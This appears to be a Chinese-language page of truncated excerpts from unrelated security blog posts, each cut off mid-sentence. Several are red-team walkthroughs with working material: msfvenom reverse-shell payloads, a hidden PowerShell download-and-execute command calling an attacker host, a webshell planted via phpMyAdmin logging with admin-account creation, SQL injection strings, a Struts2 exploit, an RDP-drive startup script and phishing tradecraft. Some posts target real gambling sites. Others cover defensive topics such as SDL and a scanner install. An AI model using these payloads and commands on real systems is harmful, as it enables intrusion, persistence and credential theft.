红队攻击面相关讨论

0x01 信息收集 在攻陷一台机器后，不要一味的直接去抓取机器密码、去做一些扫描内网的操作，因为如果网内有IDS等安全设备，有可能会造成报警，丢失权限。本节主要介绍当一台内网机器被攻破后，我们收集信息的一些手法。 1.1、SPN SPN：服务主体名称。使用Kerberos须为服务器注册SPN，因此可以在内网中扫描SPN，快速寻找内网中注册的服务，SPN扫描可以规避像端口扫描的不确定性探测动作。主要利用工具有：setspn、GetUserSPNs.vbs和Rubeus。 a、利用Windows自带的setspn工具，普通域用户权限执行即可： setspn -T domain.com -Q */* 在上述截图中可以清晰的看到DCServer机器上运行了dns服务。如果网内存在mssql，利用SPN扫描也可以得到相应的结果。 b、利用GetUserSPNs.vbs也可以获取spn结果: c、Rubeus工具是Harmj0y开发用于测试Kerberos的利用工具。 如下图利用Rubeus查看哪些域用户注册了SPN，也为后续Kerberoasting做准备： 1.2、端口连接 利用netstat -ano命令获取机器通信信息，根据通信的端口、ip可以获取到如下信息。如果通信信息是入流量，则可以获取到跳板机/堡垒机、管理员的PC来源IP、本地web应用端口等信息；如果通信信息是出流量，则可以获取到敏感端口（redis、mysql、mssql等）、API端口等信息。 1.3、配置文件 一个正常的Web应用肯定…

0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞，该漏洞攻击者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种“即插即用”的配置和图像管理功能，可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置，将其安装到网络中，然后启动，无需其他配置要求。因此它可以完全控制易受攻击的网络设备。Smart Install是一种即插即用的配置和图像管理的功能，为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化，并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是，该功能在默认情况下客户端上是启用了的。 0x02漏洞描述 思科 IOS 和 IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞（CVE-2018-0171）。攻击者可以远程向 TCP 4786 端口发送一个恶意数据包，利用该漏洞，触发目标设备的栈溢出漏洞造成设备拒绝服务（DoS）或在造成远程命令执行，攻击者可以远程控制受到漏洞影响的网络设备。据悉，思科交换器 TCP 4786 端口是默认开放的 0x03检查漏洞 1.如果您的思科网络设备开放了TCP 4786端口，则易受到攻击，为了找到这样的设备，只需通过nmap扫描目标网络。 nmap -p T:4786 192.168.1.0/24 2.要检查网络设备是否开放了Smart Install Client客户端功能，以下示例…

0x00 漏洞简介Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530)，在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行，风险极大。0x01 漏洞描述Struts2 会对某些标签属性(比如 `id`，其他属性有待寻找) 的属性值进行二次表达式解析，因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时，用户再传入一个 `%{payload}` 即可造成OGNL表达式执行。S2-061是对S2-059沙盒进行的绕过。0x02 漏洞影响struts 2.0.0 - struts 2.5.250x03 漏洞复现一.环境搭建1.docker环境地址：https://github.com/vulhub/vulhub/tree/master/struts2/s2-061docker-compose up -d #启动docker环境2.访问目标地址 http://192.168.1.14:8080/index.action 二、漏洞利用1.DNSlog验证漏洞 POST /index.action HTTP/1.1Host: 192.168.1.14:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows N…

一、导入mysql数据前期设置 1.建库和表统一编码设置为UTF8，根据数据中的编码来修改（也可以将数据全部转换为utf-8格式，小文件可用notepad来修改编码，大文件可用 LogViewPro 来修改编码） 2.对MySql数据库进行优化配置 my.ini优化配置： [mysql] default-character-set=utf8 [mysqld] port=3306 basedir=F:/phpstudy_pro/Extensions/MySQL5.7.26/ datadir=F:/phpstudy_pro/Extensions/MySQL5.7.26/data/ character-set-server=utf8 #默认的数据库编码 default-storage-engine=MyIsam #数据库引擎，myisam适合于查询 max_connections=1000 #客户端和服务器最大连接数，默认为1000 collation-server=utf8_unicode_ci init_connect='SET NAMES utf8' innodb_buffer_pool_size=4096M #一般设置 buffer pool 大小为总内存的 3/4 至 4/5 innodb_flush_log_at_trx_commit=2 #当设置为2，该模式速度较快，也比0安全，只有在操作系统崩溃或者系统断电的情况下，上一秒钟所有事务数据才可能丢失。 inn…

0x01 环境准备kali（模拟公网攻击机） Windows2008（靶机，装有360、火绒、安全狗、D盾） Powersploit（PowerShell攻击框架） https://github.com/PowerShellMafia/PowerSploit 0x02 尝试落地payload首先msfvenom生成exe后门程序 msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe lhost=192.168.192.119 lport=6666 -o ./6666.exePython3开启http下载服务 python3 -m http.servermsf开启监听 执行powershell命令时被火绒拦截 (New-Object Net.WebClient).DownloadString("http://192.168.192.119:8000/6666.exe") 0x03 PowerShell内存执行exe这也是现在红军非常流行的攻击手法，payload在内存中加载执行，也就是所谓的文件不落地，大致分以下几步 先将生成的payload在本地进行base64编码靶机执行远程下载命令靶机对payload进行解码并赋值给一个变量PowerShell远程加载Invoke-ReflectivePEInjection模块（PE反射注入）并执行payload本地编码payloadPowerShell下执行 function Convert-BinaryToString { …

通知 下面将会发布四篇文章以小白的视角(我压根不用装,因为我也是第一次学)来第一人称学习一下计算机网络一些原理 而且较为基础,请不要认为我在水文章,反而我坚定的认为这些基础的知识为以后的渗透思路能提供很大帮助！ 模块地址：https://tryhackme.com/paths 其中第一篇网络安全只是引入安全就不必为大家更新 更新一下后四章,一章一个文章 深深解析一下：

初赛web_ezcmsswagger泄露test/test测试账号登录，/sys/user/**没有做鉴权，可以添加一个超级管理员用户， 此时仍然不知道roleId。并且role模块没有未授权。继续阅读user模块，发现接口 这里存在roleid泄露，这里填入前面泄露的admin的id fcf34b56-a7a2-4719-9236-867495e74c31 GET /sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31此时知道了超级管理员id为 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9，添加用户 { "createWhere":0, "deptId":"1", "email":"", "password":"123456", "phone":"11111111111", "roleIds":[ "11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9" ], "sex":"fmale", "username":"hacker" }password字段解码失败，然后用test账户查看日志发现了aes的key：AbCdEfGhIjKlMnOp，然后添加用户成功，我们添加用户之后，在模块发现了ping功能，但是有waf，绕过waf执行命令，得到flag POST /sys/ping HTTP/1.1 Host: User-Agent:Mozilla/5.0(Macintosh;IntelMac OS X 10.15; rv:126.…

某天挖 edu 挖到自闭，然后想着 fofa 一下，看看有没有什么好玩的站点 好家伙，居然还真有这种商城，原谅我孤陋寡闻了。于是乎，想进去学习了一下 首先，进行了一下初步的信息收集 基本上都是伪静态的，没有什么发现可以明显判断其网站后端语言的地方在搜索框点击搜索后 可以发现这个地址并不能帮助我们判断该站的类型但也要尝试一下SQL注入 然后直接被 Ban IP了，索性放弃对这个地方的继续研究，继续翻找其他功能点。当我们点击订单查询时 可以发现Url 产生了变化 跳转到了登录注册页面，既然来都来了，注册一个看看有没有其他业务，黑不走空，哈哈哈 昵称处尝试打 Xss，发现也会被 Ban IP，那就先放一下，找找有没有什么业务逻辑漏洞吧。尝试购买一些商品，之前一直听说支付漏洞，但弟弟从没有真正遇到过，碰碰运气吧 点击购买，抓包发现 cookie 中出现了一个奇怪的参数 我们拿去urldecode 一下，看看是什么东西 那就猜测一下，可以看到前面应该是价格，后面是购买的个数，我们先改一下 编码回去，覆盖发包 因为在 cookie 里，所以传过去的每个数据中的 cookie 都要改 可以发现，我们的单价变为了 1，数量为 10，总额变为了 10，记录一下参数之间对应的关系 提交订单，修改cookie内的值，然后继续，页面跳转到了支付宝付款页面 点开支付宝，发现价格的确发生改变 没错，75元的商品，只需要17元即可支付，但是商家发不发货就不晓得了 意外惊喜 然后，我…

日常流程简要说明入口权限 => 内网搜集/探测 => 免杀提权[非必须] => 抓取登录凭证 => 跨平台横向 => 入口维持 => 数据回传 => 定期权限维护 0x01 入口权限获取 [ 前期侦察，搜集阶段本身就不存在太多可防御的点，非防御重心 ]1.绕CDN找出目标所有真实ip段(1).通过全国多个PING，查看IP地址是否唯一来判断是否存在CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2).通过之前的DNS绑定历史记录来查找真实IP地址https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3).通过获取多个子域名，并批量对多个子域名进行ping，可判断该子域名的IP段就是真实IP段（主站用了CND，而子域名分站不用Cdn解析）Layer子域名挖掘机/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(…

简述 钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集 批量邮箱搜集 https://app.snov.io/ http://www.skymem.info/ 搜索引擎 一般来说，企业邮箱都存在邮件网关，邮件投递容易被退信拦截，所以我们要选择私人邮箱或不被邮服拦截的邮箱： 如 xx举报，xx招聘面对大众的邮箱，相关语法： site:"xxx.com" 举报 site:"xxx.com" 招聘 xx公司举报 @126.com xx公司招聘 @qq.com 钓鱼手法 社工钓鱼 首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，提前准备多套场景应对 选择目标公司分部进行钓鱼成功率较高，提前想好话术和应变对策，避免被识破，最好不要在总部，避开IT信息安全部 社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木马（需要过人的心理素质和应变能力，之前从潘高工身上学到很多） 邮件钓鱼 群发邮件（不推荐，易被管理员发现或被邮件网关拦截） 搜集关键人物个人邮箱定向投递（推荐，隐蔽性强） 福利补贴发放 紧贴时事话题，使用各种福利活动吸引目标用户点击，把钓鱼链接转为二维码发送 简历投递 招聘投递简历，hr面对大量简历不会仔细查看后缀 钓鱼…

0x01 thinkadmin历史漏洞复习已经找到对方的app的后台地址是thinkadmin，因此我们需要去复习thinkadmin的历史漏洞。 CVE-2020-25540 https://github.com/zoujingli/ThinkAdmin/issues/244 利用POC如下 https://github.com/Schira4396/CVE-2020-25540 列目录 POST /?s=admin/api.Update/noderules=["runtime/"]文件读取 /?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b363932382x312t1b其本质大概想设计出来一个能让第三方去对比服务器上的系统web文件的功能，结果因为目录穿越造成任意目录读取。虽然有一定限制，但危害还是非常非常大，因此后续更新直接将这个功能下架。 还有一个没有CVE的反序列化漏洞 https://github.com/zoujingli/ThinkAdmin/issues/238 存在两处接口，其中一处正是上面列目录功能的rules传参。 POST /?s=admin/api.Update/noderules=payload另外一处则是 POST /?s=wechat/api.Push/indexreceive=payload 0x02 第一份源码因为官方已经不提供旧版源码下载，所以我第一时间去其他地方找到了一份使用thinkphp5.1…

0x00 信息搜集朋友给了我一个站，算一个比较大的bc，主站看了一下，没有入口，就换了他的一个推广平台 然后首先大致扫了一下目录，希望可以看见一些有用的东西。 这个时候我可以推荐大家一个接口，可以快速大致看看他重要的文件 https://scan.top15.cn/web/infoleak 例如探针，网站源码是否打包，很明显我没有扫出来，然后给大家看看扫描结果。 config.inc.php根据经验看应该是数据库的配置文件，但是大小为0B,试探性的访问一下，果然什么都没有 upload访问就是403，但是根据经验还是会再去扫一下它，说不定是什么fck编辑器呢，也很遗憾，啥子都没有扫到。 /index.php/login/ ，大小只有2kb，也根本不是后台，有点失落。 端口的话也只有这一个web资产，只好看一下他的网站功能了。 然后点击了一下查询，希望可以在这里找找注入。 0x01 后台注入 果然，有注入，剩下的就是找后台了。 查看当前数据库，and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- 这里记一下踩坑，account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--(' 这是完整的payload，最开始我的payload为account=1') and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-…

EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public 起点是 sorry 类的 __destruct(), 由 echo $this->hint 调用到 show 类的 __toString() 方法, 然后通过执行 $this->ctf->show() 跳转 secret_code 类的 __call() , 进而到 show() 方法, 在 show() 方法中访问不存在的属性, 跳转到 sorry 类的 __get(), 最后通过 $name() 跳到 fine 类的 __invoke() pop 链构造如下 <?php class fine { public $cmd; public $content; } class show { public $ctf; public $time; } class sorry { public $name; public $password; public $hint; public $key; } class secret_code { public $code; } $e = new fine(); $e->cmd = 'system'; $e->content = 'cat /flag'; $d = new sorry(); $d->key = $e; $c = new secret_code(); $c->code…

0x00 前言 闲着无聊，网上随便找了一个菠菜进行简单测试，并做笔记记录，大佬们轻喷，有什么不足之处请指教。 0x01 弱口令访问网站就是一个登录页面，没有验证码直接bp开启，成功爆出弱口令admin/123456，直接进入后台。 0x02 注入拿下权限翻看了很多功能点，在一处功能点发现上传接口，并尝试上传文件，发现无法上传，加了白名单。直接选择放弃，继续寻找。在某一个http://url/GroupMember.aspx?gid= 参数上加上单引号，直接报错，SQL注入这不就来了么。 说干就干，直接SQLMAP。 发现为MSSQL，且DBA权限，直接--os-shell 上线MSF 已经获取普通权限，接下来就是上线msf提权。msf生成powershell脚本，并放置在网站目录下。 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1 Vps开启监听 使用powershell上线session powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))" 如果想要通过url拼接堆叠执行powershell会存在一个问题，就是单引号闭合问题。我们可以通过对powershell进行编码一下，这样就可以绕过单引号的问题。下面推…

一、漏洞描述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）. 二、危险等级 高危 三、漏洞危害 攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害 四、影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 五、前提条件 对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomc…

近期在项目中管理员在rdp挂载之后搞掉了管理员，想着有时间就整理下针对rdp的利用方法。 针对挂盘的利用方法复制文件这个不多说，可以根据的不同的挂盘来决定是拖文件还是放启动项。有一些自动文件监控和拷贝的应用,如：https://github.com/cnucky/DarkGuardianDarkGuardian是一款用于监控RDP登录后TSCLIENT(挂盘)的工具,工具后台运行时可自动获取挂盘的文件列表,下载指定文件,拷贝木马文件到挂载硬盘的启动项等功能 RDPInception这种方法相对鸡肋一点，原理就是利用bat脚本放到server启动项/winlogon执行脚本处，等待管理员挂盘后重启执行命令。 @echo off echo Updating Windows ... @echo off timeout 1 >nul 2>&1 mkdir \\tsclient\c\temp >nul 2>&1 mkdir C:\temp >nul 2>&1 copy run.bat C:\temp >nul 2>&1 copy run.bat \\tsclient\c\temp >nul 2>&1 del /q %TEMP%\temp_00.txt >nul 2>&1 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s \\tscl…

0x01 前言 RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时，用户权限较少的账户相较管理员权限的用户受到的影响更小。 攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制，文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件，打开此驱动器 （或远程共享） 时，恶意文件就会在目标系统上执行攻击者的代码。 0x02 漏洞环境搭建与利用 漏洞环境搭建： kalix86 192.168.1.109 攻击机 windows7x64 192.168.1.101 目标靶机 漏洞利用： 1.kali主机下载cve_2017_8464_lnk_rce.rb： cd /opt wget https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb 2.将cve_2017_8464_lnk_rce.rb拷贝到 /usr/share/metasploit-framework/modules/exploit/windows/smb/目录下： cp cve_2017_8464_lnk_rce.rb /usr/share/me…

获取phpmyadmin弱口令 通过信息收集到彩票站点的ip为xxx，探测扫描发现存在phpmyadmin，通过猜测，使用默认弱口令(root/root)登入到phpmyadmin当中。 通过phpmyadmin后台sql查询写入shell到日志文件 使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。 流程和命令如下: 1、开启日志功能：set global general_log=on; 2、点击phpmyadmin变量查看日志文件名字: 这里的日志文件是test.php。 3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>'; 4、执行成功返回。 5、查看日志文件。 6、菜刀连接添加用户并且上传mimikatz。 使用菜刀连接日志文件木马，xxx/test.php 密码:test 查看发现是系统管理员sysytem权限，直接添加用户且添加到管理组即可。 命令为: C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add 上传mimikataz到服务器当中。 7、3389连接，读取管理员密码。 （1）、直接telnet ip 3389 测试发现可通，于是直接连接3389进去。 （2）、或者这里在菜刀上执行以下命令查询3389开放的端口…

20231206085712722.doc 下载 doc文件 262.3K

0x00 前言随着菠菜类违法站点的肆虐，让无数人妻离子散。为此，献上一份微薄之力，希望能给“有关部门”提供一些帮助。今天给大家表演的是收割BC天恒盛达。 0x01 程序介绍程序采用PHP5.4 + MySQL 程序结构如下 基本上目前做此类违法站点的不法分子，除了外包以外就是天恒、大发几套程序模改的。暂时，这边由于技术水平上面的问题，只能够发出天恒的。版本可能有点老。但是，一大部分还是用的。经某位不愿透露自己姓名的网友4月中旬实测，大约70%的存在这些问题，而使用这套程序的违法站点经过半个小时的采集大约在5000~20000左右。 0x02 漏洞详情1、money - SQL注入 web\wjaction\default\PayOnlineBack.class.php 继续跟进money，此处为GET获取，接着看条件 条件展示，第一个为Key验证，这个在配置文件里。如果Key错误则表示所有订单都无法生效。也就是说Key肯定是在URL请求内，这个验证即可绕过。 继续看条件，这里是生成一个MD5值进行校验。但是这种校验是有缺陷的，此处并未把key的值带入进去。所以我们直接提交的时候，把$tno.$payno.$money都设为空。那么我们将获取$md5key的MD5值。因为$sign在URL中能展示出来。解密后，我们再按照他的验证机制就可以写脚本，进行注入了。 往下继续看，交易号随机来就行了。 继续看，最后一个验证。这里的用户名肯定是真实的，所以这里的验证就算是废掉了 接下来，根据前面的分析，就可…

0x00 前言 本文主要介绍一下MSF模块的下载、使用，以及当攻击机处于内网，而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下，并没有新的知识点，可以为刚入门的新手抛砖引玉，提供一条解决问题的思路，同时也记录一下过程，加强记忆。 主要分为两个知识点，一是SMB漏洞的批量检测，二是内网穿透技术。 首先是环境的搭建，具体如下表所示： 主机IP备注 Kali 64位 192.168.232.134 攻击机 Windows XP 32位 192.168.232.128 安装了python2.6，下载有方程式利用工具包（主要为Windows目录下的工具） Window2008 R2 64位 10.50.2.62 靶机，存在MS17-010漏洞，并可以访问外网 0x01 SMB漏洞批量检测 1.扫描脚本的下载和加载 由于Metasploit还没有更新MS17-010检测的模块，所以要去exploit-db下载，并在MSF中加载。 root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb …

0x00 前言 本文演示了白名单AppLocker bypass的最常见和最熟悉的技术。我们知道，出于安全原因，系统管理员添加组策略来限制本地用户的应用程序执行。在上一篇文章中，我们讨论了“ Windows Applocker策略 - 初学者指南”，因为它们为应用程序控制策略定义了AppLocker规则，以及如何使用它们。但今天您将学习如何使用rundll文件绕过AppLocker策略。 DLL文件对于Window的操作系统非常重要，它还决定了自定义Windows的其他程序的运行。动态链接库（DLL）文件是一种文件类型，它向其他程序提供有关如何调用某些内容的指令。因此，多个软件甚至可以同时共享这样的DLL文件。尽管与.exe文件的格式相同,但DLL文件不能像.exe文件那样直接执行。dll文件扩展名可以是：.dll（动态链接库）、.ocx（ActiveX控件）、.cpl（控制面板）、.drv（设备驱动程序） 0x01 运行 当AppLocker使用时，DLL文件被分为多个部分。这使得DLL文件的运行变得简单快捷。每个部分都在运行时安装在主程序中。由于每个部分都不同且独立的，所以加载时间更快，并且仅在需要所述文件的功能时才完成。此功能还使升级更容易应用，而不影响其他部分。例如，您有一个字典程序，每个月都会添加新词，因此，对于这个程序，您所要做的就是更新它；而不需要为它安装一个完整的另一个程序。 1.优点 使用更少的资源 促进模块化架构 简化部署和安装 2.缺点 依赖DLL将升级到新版本 依赖DLL是固定的 依赖DLL将被早期版本…

巡风简介 巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统，通过搜索功能可清晰的了解内部网络资产分布情况，并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。其主体分为两部分：网络资产识别引擎与漏洞检测引擎。 网络资产识别引擎会通过用户配置的IP范围定期自动的进行端口探测（支持调用MASSCAN），并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。 漏洞检测引擎会根据用户指定的任务规则进行定期或者一次性的漏洞检测，其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。（转自https://github.com/ysrc/xunfeng） 安装Ubuntu就不说了，说下国内的比较快的源吧，省的网速不好，只能干等 Ubuntu 17.04的开发代号是Zesty Zapus，以下是Ubuntu 17.04网易源： sudo nano /etc/apt/source.list deb http://mirrors.163.com/ubuntu/ zesty main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-security main restricted universe multiverse deb http://mirrors.163.com/ubuntu/ zesty-updates main restricted universe multiverse deb http://mi…

###命令执行定义 直接调用操作系统命令： 当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。 命令执行是指攻击者通过浏览器或者其他客户端软件提交一些cmd命令（或者bash命令）至服务器程序，服务器程序通过system、eval、exec等函数直接或者间接地调用cmd.exe执行攻击者提交的命令。 系统命令执行是指应用程序对传入命令行的参数过滤不严格导致恶意用户能控制最终执行的命令。应用有时需要调用一些执行系统命令的函数，如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击，这就是命令执行漏洞。 ###命令执行与代码执行的判断与区别 参考OWASP的 代码注入和命令注入，其中的相关解释:可以用下面一句话判断是代码执行还是命令执行：执行效果是否受制于语言本身与其安全机制。 代码执行漏洞指的是可以执行PHP脚本代码，而命令执行漏洞指的是可以执行系统命令或应用指令（如cmd命令或bash命令）的漏洞。代码执行漏洞是调用系统命令的漏洞，命令执行漏洞是直接调用系统命令，又称为os命令执行漏洞。 这里先给大家看一下两种漏洞的区别，命令执行长这样： 代码执行长这样： 1.代码执行 1. 执行的…

一、前言一般安全都属于运维部下面，和上家公司的运维总监聊过几次一些日常安全工作能不能融入到DevOps中，没多久因为各种原因离职。18年入职5月一家第三方支付公司，前半年在各种检查中度过，监管形势严峻加上大领导对安全的重视(主要还是监管)，所有部门19年的目标都和安全挂钩。由于支付公司需要面对各种监管机构的检查，部分安全做的比较完善，经过近一年对公司的熟悉发现应用安全方面比较薄弱。这部分业内比较好的解决方案就是SDL，和各厂商交流过之后决定自己照葫芦画瓢在公司一点一点推广。 上图为标准版的SDL,由于运维采用DevOps体系，测试也使用自动化进行功能测试，版本迭代周期比较快,安全人手不足加上对SDL的威胁建模等方法也一头雾水、如果把安全在加入整个流程会严重影响交付时间。在这种情况调研了一些业内的一些做法，决定把SDL精简化 。精简版SDL如下： . 二、精简版SDL落地实践安全培训SDL核心之一就是安全培训，所以在安全培训上我们做了安全编码、安全意识、安全知识库、安全SDK 安全编码：我们在网上找了一些java安全编码规范、产品安全设计及开发安全规范结合公司实际业务出了一版。 因为各种监管机构对培训都有要求，借此推了一下安全培训，定期对开发和新员工入职的培训。 安全意识：公司有企业微信公众号，大部分员工都关注了，在公众号推广了一波。 宣传完之后答题，答题满分送小礼品 因为人手不足，而功能测试和安全测试本质上有很多相通的地方，测试部门也比较配合，针对测试人员做了一些安全测试相关的培训，但是效果并不是太理想。 安全知识库：在漏洞修…